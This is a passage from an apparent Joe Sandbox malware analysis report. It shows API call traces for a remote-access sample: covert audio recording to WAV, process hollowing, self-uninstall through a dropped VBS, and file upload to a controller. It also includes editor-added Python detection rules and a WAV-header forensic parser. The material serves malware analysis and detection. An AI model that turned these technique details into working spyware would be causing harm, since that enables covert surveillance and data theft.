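The four function entries above (wallpaper change via SystemParametersInfoW with uiAction 0x14 plus Control Panel\Desktop registry writes; the two uninstall routines that delete an HKCU key, launch a dropped update.vbs and call ExitProcess; the ntdll-resolving routine that creates a process with dwCreationFlags 0x4, unmaps its image, writes memory and resets the thread context before ResumeThread, i.e. process hollowing; and the mutex-guarded drop of temp_*.exe followed by ShellExecuteW) are each identifiable from the call set alone. The following is an editor-supplied example, not part of the Joe Sandbox report and not Remcos code: a Python parser for the API lines in the format this report uses, with pattern rules keyed on exactly the calls and argument values shown above. The pattern names and the minimum call sets are this example's own choices; the sample traces are lines copied from the entries above (a subset of each entry's lines).

```python
"""Parse Joe Sandbox per-function API lines and flag behaviour patterns (editor's example)."""
import re
from dataclasses import dataclass
from typing import List, Optional, Set, Tuple

# Line shape used in this report: [Part of subcall function ADDR: ]Func.MODULE(args), ref: ADDR
CALL_RE = re.compile(
    r"^\s*•?\s*(?:Part of subcall function (?P<parent>[0-9A-F]{8}): )?"
    r"(?P<api>\w+)\.(?P<mod>\w+)(?:\((?P<args>.*)\),)? ref: (?P<ref>[0-9A-F]{8})\s*$"
)
CREATE_SUSPENDED = 0x4          # CreateProcessW dwCreationFlags bit
SPI_SETDESKWALLPAPER = 0x14     # SystemParametersInfoW uiAction
HKEY_CURRENT_USER = 0x80000001

@dataclass(frozen=True)
class Call:
    api: str
    module: str
    args: Tuple[str, ...]
    ref: str
    parent: Optional[str]       # sub-function address when the call is indirect

def parse_calls(text: str) -> List[Call]:
    calls = []
    for line in text.splitlines():
        m = CALL_RE.match(line)
        if m:
            raw = m.group("args")
            args = tuple(a.strip() for a in raw.split(",")) if raw else ()
            calls.append(Call(m.group("api"), m.group("mod"), args, m.group("ref"), m.group("parent")))
    return calls

def hex_arg(call: Call, index: int) -> Optional[int]:
    """Argument as int when the sandbox logged a concrete value; None for '?' or string args."""
    try:
        return int(call.args[index], 16)
    except (IndexError, ValueError):
        return None

def classify(calls: List[Call], strings: Tuple[str, ...] = ()) -> Set[str]:
    """Pattern names and minimum call sets below are this example's own assumptions."""
    apis = {c.api for c in calls}
    resolved = {a for c in calls if c.api.startswith("GetModuleHandle") for a in c.args}
    found = set()
    if (any(c.api == "CreateProcessW" and (hex_arg(c, 5) or 0) & CREATE_SUSPENDED for c in calls)
            and resolved & {"ZwUnmapViewOfSection", "NtUnmapViewOfSection"}
            and {"GetThreadContext", "WriteProcessMemory", "SetThreadContext", "ResumeThread"} <= apis):
        found.add("process_hollowing")
    if (any(c.api == "SystemParametersInfoW" and hex_arg(c, 0) == SPI_SETDESKWALLPAPER for c in calls)
            and any(c.api == "RegSetValueExA" and "Control Panel\\Desktop" in c.args for c in calls)):
        found.add("wallpaper_change")
    if (any(c.api == "RegDeleteKeyA" and hex_arg(c, 0) == HKEY_CURRENT_USER for c in calls)
            and {"ShellExecuteW", "ExitProcess"} <= apis
            and any(s.endswith("\\CurrentVersion\\Run\\") for s in strings)
            and any("DeleteFile(Wscript.ScriptFullName)" in s for s in strings)):
        found.add("self_uninstall_via_vbs")
    if ({"CreateMutexA", "GetTempFileNameW", "ShellExecuteW"} <= apis
            and any(c.api == "lstrcatW" and ".exe" in c.args for c in calls)):
        found.add("drop_and_execute_temp_exe")
    return found

# Sample input: lines copied from the report entries above (a subset of each entry).
HOLLOWING_TRACE = r"""
• GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 0041815E
• GetProcAddress.KERNEL32(00000000), ref: 00418161
• CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 00418217
• GetThreadContext.KERNEL32(?,00000000), ref: 00418245
• WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 0041840B
• SetThreadContext.KERNEL32(?,00000000), ref: 00418428
• ResumeThread.KERNEL32(?), ref: 00418435
"""
WALLPAPER_TRACE = r"""
• SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041CAD7
  • Part of subcall function 0041376F: RegSetValueExA.ADVAPI32(0046611C,?,00000000,?,00000000,00000000,Control Panel\Desktop,?,?,0041CAB1,WallpaperStyle,0046611C,00000001,00474EE0,00000000), ref: 004137A6
"""
UNINSTALL_TRACE = r"""
• RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040D530
• ShellExecuteW.SHELL32(00000000,open,00000000,00466468,00466468,00000000), ref: 0040D7C4
• ExitProcess.KERNEL32 ref: 0040D7D0
"""
# "String ID" entries are '$'-separated in the report; these are from the uninstall entry above.
UNINSTALL_STRINGS = tuple(r'''On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\update.vbs$fso.DeleteFile(Wscript.ScriptFullName)$while fso.FileExists("'''.split("$"))
UPDATE_TRACE = r"""
• CreateMutexA.KERNEL32(00000000,00000001,00000000,00000000,004750E4,00000003), ref: 00412494
• GetTempFileNameW.KERNEL32(?,temp_,00000000,?), ref: 004125EF
• lstrcatW.KERNEL32(?,.exe), ref: 00412601
• ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 00412641
"""
```

Usage: `classify(parse_calls(HOLLOWING_TRACE))` returns `{"process_hollowing"}`; pass the entry's `String ID` values as the second argument when a rule depends on strings rather than call arguments, as the uninstall rule does. Argument values of `?` (not recovered by the sandbox) are treated as unknown rather than as zero, so a rule keyed on a flag value only fires when the flag was actually logged.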

                                APIs
                                • mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 0041B13C
                                • mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 0041B150
                                • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,004660A4), ref: 0041B178
                                • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00474EE0,00000000), ref: 0041B18E
                                • mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 0041B1CF
                                • mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 0041B1E7
                                • mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 0041B1FC
                                • SetEvent.KERNEL32 ref: 0041B219
                                • WaitForSingleObject.KERNEL32(000001F4), ref: 0041B22A
                                • CloseHandle.KERNEL32 ref: 0041B23A
                                • mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 0041B25C
                                • mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 0041B266
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
                                • String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped$NG
                                • API String ID: 738084811-2094122233
                                • Opcode ID: 6950fa60c67da0165606eeaae49d0d75b99f3a8629193b9fdbb0be8d76f71a2c
                                • Instruction ID: fe650b41180b39ed17604f18bcb9a712e211fca36760164052b554565c231c06
                                • Opcode Fuzzy Hash: 6950fa60c67da0165606eeaae49d0d75b99f3a8629193b9fdbb0be8d76f71a2c
                                • Instruction Fuzzy Hash: 0351A3B12842056AD314B771DC96ABF379CDB84358F10043FB64A521E2EF788D48CA6E
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AD9
                                • WriteFile.KERNEL32(00000000,RIFF,00000004,?,00000000), ref: 00401B03
                                • WriteFile.KERNEL32(00000000,00000000,00000004,00000000,00000000), ref: 00401B13
                                • WriteFile.KERNEL32(00000000,WAVE,00000004,00000000,00000000), ref: 00401B23
                                • WriteFile.KERNEL32(00000000,fmt ,00000004,00000000,00000000), ref: 00401B33
                                • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401B43
                                • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B54
                                • WriteFile.KERNEL32(00000000,00472AAA,00000002,00000000,00000000), ref: 00401B65
                                • WriteFile.KERNEL32(00000000,00472AAC,00000004,00000000,00000000), ref: 00401B75
                                • WriteFile.KERNEL32(00000000,00000001,00000004,00000000,00000000), ref: 00401B85
                                • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B96
                                • WriteFile.KERNEL32(00000000,00472AB6,00000002,00000000,00000000), ref: 00401BA7
                                • WriteFile.KERNEL32(00000000,data,00000004,00000000,00000000), ref: 00401BB7
                                • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401BC7
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: File$Write$Create
                                • String ID: RIFF$WAVE$data$fmt
                                • API String ID: 1602526932-4212202414
                                • Opcode ID: 62b265300192e2cf3fc36ee1b19606fb2409bb2919511e1e0316a81c88f5e1bc
                                • Instruction ID: 2ec91bc18be8700290cedec85ec8f66933089e8d2246bcc6fed4c3761e19f715
                                • Opcode Fuzzy Hash: 62b265300192e2cf3fc36ee1b19606fb2409bb2919511e1e0316a81c88f5e1bc
                                • Instruction Fuzzy Hash: EB414E72644308BAE210DA51DD86FBB7EECEB89B50F40441AF644D60C0D7A4E909DBB3
                                Uniqueness

                                Uniqueness Score: -1.00%
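The WriteFile sequence in the entry above (RIFF, a 4-byte size, WAVE, "fmt ", a 4-byte chunk length, then 2/2/4/4/2/2-byte fields, then "data" and a 4-byte size) is the canonical 44-byte PCM WAV header, so the sample writes its audio capture as a standard WAV file. The following is an editor-supplied example, not code from the report or from the sample: a Python builder and parser for that exact layout, which an analyst can use to validate an audio capture recovered from a victim host and to repair one whose size fields were never patched because the recorder was killed. The channel count, sample rate and bit depth used are constructed assumptions for the test, not values recovered from the sample.

```python
"""Canonical 44-byte PCM WAV header: build, parse, and repair the size fields (editor's example)."""
import struct

HEADER_LEN = 44
# RIFF, riff_size, WAVE, "fmt ", fmt_size, tag, channels, rate, byte_rate, align, bits, "data", data_size
HEADER_FMT = "<4sI4s4sIHHIIHH4sI"

def build_wav_header(pcm_len: int, channels: int = 1, sample_rate: int = 8000, bits: int = 16) -> bytes:
    """Emit the same field sequence the WriteFile calls above produce, for PCM (format tag 1)."""
    block_align = channels * bits // 8
    byte_rate = sample_rate * block_align
    return struct.pack(HEADER_FMT, b"RIFF", 36 + pcm_len, b"WAVE", b"fmt ", 16, 1,
                       channels, sample_rate, byte_rate, block_align, bits, b"data", pcm_len)

def parse_wav_header(blob: bytes) -> dict:
    """Decode the header and cross-check its size fields against the bytes actually present."""
    if len(blob) < HEADER_LEN:
        raise ValueError("shorter than a canonical WAV header")
    (riff, riff_size, wave, fmt_tag, fmt_size, fmt, ch, rate,
     byte_rate, align, bits, data_tag, data_size) = struct.unpack(HEADER_FMT, blob[:HEADER_LEN])
    if (riff, wave, fmt_tag, data_tag) != (b"RIFF", b"WAVE", b"fmt ", b"data") or fmt_size != 16:
        raise ValueError("not a canonical PCM WAV header")
    present = len(blob) - HEADER_LEN
    return {
        "format": fmt, "channels": ch, "sample_rate": rate, "bits": bits,
        "data_size": data_size, "present": present,
        # the header's own arithmetic agrees with itself
        "consistent": riff_size == 36 + data_size and align == ch * bits // 8 and byte_rate == rate * align,
        # fewer sample bytes on disk than the header claims (capture cut short)
        "truncated": present < data_size,
        "duration_seconds": present / byte_rate if byte_rate else 0.0,
    }

def fix_sizes(blob: bytes) -> bytes:
    """Rewrite the RIFF and data sizes from the real length so a truncated capture still plays."""
    present = len(blob) - HEADER_LEN
    out = bytearray(blob)
    out[4:8] = struct.pack("<I", 36 + present)
    out[40:44] = struct.pack("<I", present)
    return bytes(out)
```

Usage: `parse_wav_header(open(path, "rb").read())` reports whether a recovered file is internally consistent and whether it was truncated; `fix_sizes` patches only the two size fields and leaves the sample data untouched, so it is safe to run on evidence copies.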

                                APIs
                                • GetModuleHandleW.KERNEL32(ntdll.dll,RtlInitUnicodeString,00000000,C:\Users\user\AppData\Roaming\microsofts\svcs.exe,00000001,0040764D,C:\Users\user\AppData\Roaming\microsofts\svcs.exe,00000003,00407675,004752D8,004076CE), ref: 00407284
                                • GetProcAddress.KERNEL32(00000000), ref: 0040728D
                                • GetModuleHandleW.KERNEL32(ntdll.dll,NtAllocateVirtualMemory), ref: 004072A2
                                • GetProcAddress.KERNEL32(00000000), ref: 004072A5
                                • GetModuleHandleW.KERNEL32(ntdll.dll,NtFreeVirtualMemory), ref: 004072B6
                                • GetProcAddress.KERNEL32(00000000), ref: 004072B9
                                • GetModuleHandleW.KERNEL32(ntdll.dll,RtlAcquirePebLock), ref: 004072CA
                                • GetProcAddress.KERNEL32(00000000), ref: 004072CD
                                • GetModuleHandleW.KERNEL32(ntdll.dll,RtlReleasePebLock), ref: 004072DE
                                • GetProcAddress.KERNEL32(00000000), ref: 004072E1
                                • GetModuleHandleW.KERNEL32(ntdll.dll,LdrEnumerateLoadedModules), ref: 004072F2
                                • GetProcAddress.KERNEL32(00000000), ref: 004072F5
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressHandleModuleProc
                                • String ID: C:\Users\user\AppData\Roaming\microsofts\svcs.exe$LdrEnumerateLoadedModules$NtAllocateVirtualMemory$NtFreeVirtualMemory$RtlAcquirePebLock$RtlInitUnicodeString$RtlReleasePebLock$ntdll.dll
                                • API String ID: 1646373207-2831364869
                                • Opcode ID: 219bb9ae8fbeca959e8a3246f6ba2b5d667704a520b136de0cc32d122fe89174
                                • Instruction ID: f839149ce94c73eee9bda0254407c114f4740b95dc73f4bc012c28e2a4ae17e7
                                • Opcode Fuzzy Hash: 219bb9ae8fbeca959e8a3246f6ba2b5d667704a520b136de0cc32d122fe89174
                                • Instruction Fuzzy Hash: 520171E0E4431676DB216F3A6C54D4B6F9C9E5125131A087BB409E2292FEBCE800CE6D
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • lstrlenW.KERNEL32(?), ref: 0041C036
                                • _memcmp.LIBVCRUNTIME ref: 0041C04E
                                • lstrlenW.KERNEL32(?), ref: 0041C067
                                • FindFirstVolumeW.KERNEL32(?,00000104,?), ref: 0041C0A2
                                • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0041C0B5
                                • QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 0041C0F9
                                • lstrcmpW.KERNEL32(?,?), ref: 0041C114
                                • FindNextVolumeW.KERNEL32(?,0000003F,00000104), ref: 0041C12C
                                • _wcslen.LIBCMT ref: 0041C13B
                                • FindVolumeClose.KERNEL32(?), ref: 0041C15B
                                • GetLastError.KERNEL32 ref: 0041C173
                                • GetVolumePathNamesForVolumeNameW.KERNEL32(?,?,?,?), ref: 0041C1A0
                                • lstrcatW.KERNEL32(?,?), ref: 0041C1B9
                                • lstrcpyW.KERNEL32(?,?), ref: 0041C1C8
                                • GetLastError.KERNEL32 ref: 0041C1D0
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: Volume$ErrorFindLast$lstrlen$CloseDeviceFirstNameNamesNextPathQuery_memcmp_wcslenlstrcatlstrcmplstrcpy
                                • String ID: ?
                                • API String ID: 3941738427-1684325040
                                • Opcode ID: abe7e308a1a6702f98718e9be80ca678ae2d2d31c1c14d85f2c6eaae61ca29ed
                                • Instruction ID: a349862c8cee18361e8dc915c9858c0b302c9409c899df8dda18ff866c7f94c5
                                • Opcode Fuzzy Hash: abe7e308a1a6702f98718e9be80ca678ae2d2d31c1c14d85f2c6eaae61ca29ed
                                • Instruction Fuzzy Hash: 8B416171584316EBD720DFA0DC889EB77ECAB49755F00092BF545C2261EB78C988CBDA
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: _free$EnvironmentVariable$_wcschr
                                • String ID:
                                • API String ID: 3899193279-0
                                • Opcode ID: 8c398c17f7198d8e95fa4204fbdfe0aa09a5082618e125736fc7a2c78f972757
                                • Instruction ID: f75d98bba309171a1893162bbba9979c566f834f65d54a181aa040c21db392b6
                                • Opcode Fuzzy Hash: 8c398c17f7198d8e95fa4204fbdfe0aa09a5082618e125736fc7a2c78f972757
                                • Instruction Fuzzy Hash: C4D13672D007006BFB20AF799D81A6B77A4EF01318F05427FE919A7382EB3D99058799
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00412ACD
                                  • Part of subcall function 0041B978: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,0040407C), ref: 0041B99F
                                  • Part of subcall function 00418568: CloseHandle.KERNEL32(004040F5,?,?,004040F5,00465E74), ref: 0041857E
                                  • Part of subcall function 00418568: CloseHandle.KERNEL32(t^F,?,?,004040F5,00465E74), ref: 00418587
                                • Sleep.KERNEL32(0000000A,00465E74), ref: 00412C1F
                                • Sleep.KERNEL32(0000000A,00465E74,00465E74), ref: 00412CC1
                                • Sleep.KERNEL32(0000000A,00465E74,00465E74,00465E74), ref: 00412D63
                                • DeleteFileW.KERNEL32(00000000,00465E74,00465E74,00465E74), ref: 00412DC5
                                • DeleteFileW.KERNEL32(00000000,00465E74,00465E74,00465E74), ref: 00412DFC
                                • DeleteFileW.KERNEL32(00000000,00465E74,00465E74,00465E74), ref: 00412E38
                                • Sleep.KERNEL32(000001F4,00465E74,00465E74,00465E74), ref: 00412E52
                                • Sleep.KERNEL32(00000064), ref: 00412E94
                                  • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: Sleep$File$Delete$CloseHandle$CurrentModuleNameProcesssend
                                • String ID: /stext "$0TG$0TG$NG$NG
                                • API String ID: 1223786279-2576077980
                                • Opcode ID: 45816bd423e92bb8680930aa6a7d7804db8f63587a8a1e07c71b8186c8759938
                                • Instruction ID: 3b0169c2c8bc9f0d695cedb60fdc7b81a1931596247e975dd6f1dc47d42db627
                                • Opcode Fuzzy Hash: 45816bd423e92bb8680930aa6a7d7804db8f63587a8a1e07c71b8186c8759938
                                • Instruction Fuzzy Hash: 990255311083418AC325FB62D851AEFB3E5AFD4348F50483EF58A971E2EF785A49C65A
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,000000B6), ref: 00408CE3
                                • GetFileSizeEx.KERNEL32(00000000,?), ref: 00408D1B
                                • __aulldiv.LIBCMT ref: 00408D4D
                                  • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                  • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                • SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 00408E70
                                • ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00408E8B
                                • CloseHandle.KERNEL32(00000000), ref: 00408F64
                                • CloseHandle.KERNEL32(00000000,00000052), ref: 00408FAE
                                • CloseHandle.KERNEL32(00000000), ref: 00408FFC
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: File$CloseHandle$CreateLocalPointerReadSizeTime__aulldivsend
                                • String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller: $hdF$NG
                                • API String ID: 3086580692-1206044436
                                • Opcode ID: 64cefbb928e21c2f7d127ca4721bf1c832eccef9f0ecc8420659d86e10d9b8ce
                                • Instruction ID: 4fd1ef8f0950b8c70c5ee12d710945c0a569e6ad21e20d2a74dcf75f3ec9a52d
                                • Opcode Fuzzy Hash: 64cefbb928e21c2f7d127ca4721bf1c832eccef9f0ecc8420659d86e10d9b8ce
                                • Instruction Fuzzy Hash: 95B193716083409BC314FB25C982AAFB7E5AFC4354F50492FF589622D2EF789945CB8B
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • Sleep.KERNEL32(00001388), ref: 0040A740
                                  • Part of subcall function 0040A675: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,0040A74D), ref: 0040A6AB
                                  • Part of subcall function 0040A675: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040A74D), ref: 0040A6BA
                                  • Part of subcall function 0040A675: Sleep.KERNEL32(00002710,?,?,?,0040A74D), ref: 0040A6E7
                                  • Part of subcall function 0040A675: CloseHandle.KERNEL32(00000000,?,?,?,0040A74D), ref: 0040A6EE
                                • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 0040A77C
                                • GetFileAttributesW.KERNEL32(00000000), ref: 0040A78D
                                • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 0040A7A4
                                • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00000012), ref: 0040A81E
                                  • Part of subcall function 0041C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,0040412F,00465E74), ref: 0041C49E
                                • SetFileAttributesW.KERNEL32(00000000,00000006,00000013,00466468,00000000,00000000,00000000), ref: 0040A927
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: File$AttributesCreate$Sleep$CloseDirectoryExistsHandlePathSize
                                • String ID: 8SG$8SG$hdF$pQG$pQG$PG$PG
                                • API String ID: 3795512280-4009011672
                                • Opcode ID: 90f81a8c835b78a509db603d52e056b33c5ce4745e21562e65a9418a5dbb7178
                                • Instruction ID: 265ddfea45d140738b9a7e0f0353a6f5be26653907181caffe3561bb72ed66c0
                                • Opcode Fuzzy Hash: 90f81a8c835b78a509db603d52e056b33c5ce4745e21562e65a9418a5dbb7178
                                • Instruction Fuzzy Hash: A7517E716043055ACB09BB32C866ABE739A9F80349F00483FB642B71E2DF7C9D09865E
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • DefWindowProcA.USER32(?,00000401,?,?), ref: 0041D5DA
                                • GetCursorPos.USER32(?), ref: 0041D5E9
                                • SetForegroundWindow.USER32(?), ref: 0041D5F2
                                • TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 0041D60C
                                • Shell_NotifyIconA.SHELL32(00000002,00474B48), ref: 0041D65D
                                • ExitProcess.KERNEL32 ref: 0041D665
                                • CreatePopupMenu.USER32 ref: 0041D66B
                                • AppendMenuA.USER32(00000000,00000000,00000000,Close), ref: 0041D680
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
                                • String ID: Close
                                • API String ID: 1657328048-3535843008
                                • Opcode ID: dc0ab9a0fe4ab677523636461039160516679b910eee6fe46bba41fdb84f3345
                                • Instruction ID: 483e3be36cf21f9f431d69439bfbb75804d706e25d1e382f075e68ac53faeb55
                                • Opcode Fuzzy Hash: dc0ab9a0fe4ab677523636461039160516679b910eee6fe46bba41fdb84f3345
                                • Instruction Fuzzy Hash: 392127B1944208FFDB194FA4ED0EAAA3B65FB08342F000135FA0A950B1D775EDA1EB5D
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,004750E4,?,00475338), ref: 0040F48E
                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040F4B9
                                • Process32FirstW.KERNEL32(00000000,0000022C), ref: 0040F4D5
